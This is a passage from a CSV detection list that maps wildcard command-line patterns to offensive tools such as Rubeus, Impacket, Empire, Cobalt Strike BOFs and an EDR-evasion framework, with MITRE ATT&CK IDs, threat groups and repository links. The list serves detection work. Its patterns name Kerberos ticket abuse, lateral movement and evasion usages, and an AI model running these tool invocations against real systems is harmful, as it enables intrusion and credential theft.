Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Target * -Shellcode *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --target=* --payload=*cmd.exe /c*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"* -target-domain * -outputfile * -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* targetedKerberoast.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --target-name * --domain * --dc-ip * --executable *.exe*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" +"* targets-asn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-map4to6.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-multicast-echo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-multicast-invalid-dst.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-multicast-mld.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-multicast-slaac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-wordlist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-sniffer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-traceroute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --target-user * --dc-ip * -command *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"* tdotnet publish Athena *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* teamspeak2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"* telnet-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* telnet-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* telnet-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tftp-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tgssub * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* tgtdeleg /nowrap*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* tgtdeleg /spn:cifs*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"* tgtdeleg /target:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* thc-hidra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"* theHarvester.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* thief.py*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"* --threads * scan --buckets-file* ","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"* ticketsplease.*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"* TikiLoader*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"* tls-alpn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tls-nextprotoneg.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tls-ticketbleed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tn3270-screen.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* TokenStrip.c *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" +"* TokenStripBOF.o *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" +"* tokenvator *","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"* -Tokenvator -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --tor *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* tor-consensus-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --tor-port*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --tor-type*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* traceroute-geolocation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --transformer donut*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer Loader*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer sRDI*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* TSCHRPCAttack*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"* tso-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tso-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"* --type asreproast*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" +"* --type search-spn*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - 